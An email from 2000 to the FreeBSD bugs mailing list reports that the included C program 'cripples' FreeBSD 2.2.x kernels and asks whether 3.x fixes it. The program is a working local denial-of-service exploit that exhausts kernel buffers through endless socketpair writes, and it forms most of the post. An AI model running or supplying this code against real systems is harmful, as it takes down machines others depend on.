From: Greg Lynn
To: freebsd-bugs@freebsd.org
Date: Sun, 2 Jan 2000 23:49:16 -0500 (EST)
Subject: buffer overflow....

This code cripples 2.2.7 and 2.2.8 but I haven't tested it on any 3.x stable kernels. Does anyone know if this has been fixed with 3.x kernels? The code is fairly old...

#include <unistd.h>
#include <sys/socket.h>
#include <fcntl.h>

#define BUFFERSIZE 204800

extern int
main(void)
{
    int p[2], i;
    char crap[BUFFERSIZE];

    /* Loop until socketpair() fails; the descriptors are never closed. */
    while (1) {
        if (socketpair(AF_UNIX, SOCK_STREAM, 0, p) == -1)
            break;

        /* Request BUFFERSIZE-byte send and receive buffers on both ends. */
        i = BUFFERSIZE;
        setsockopt(p[0], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
        setsockopt(p[0], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
        setsockopt(p[1], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
        setsockopt(p[1], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));

        /* Non-blocking, so the writes below return instead of waiting. */
        fcntl(p[0], F_SETFL, O_NONBLOCK);
        fcntl(p[1], F_SETFL, O_NONBLOCK);

        /* Write into both ends; nothing ever reads the data back. */
        write(p[0], crap, BUFFERSIZE);
        write(p[1], crap, BUFFERSIZE);
    }
    return(0);
}

-thanks,
Greg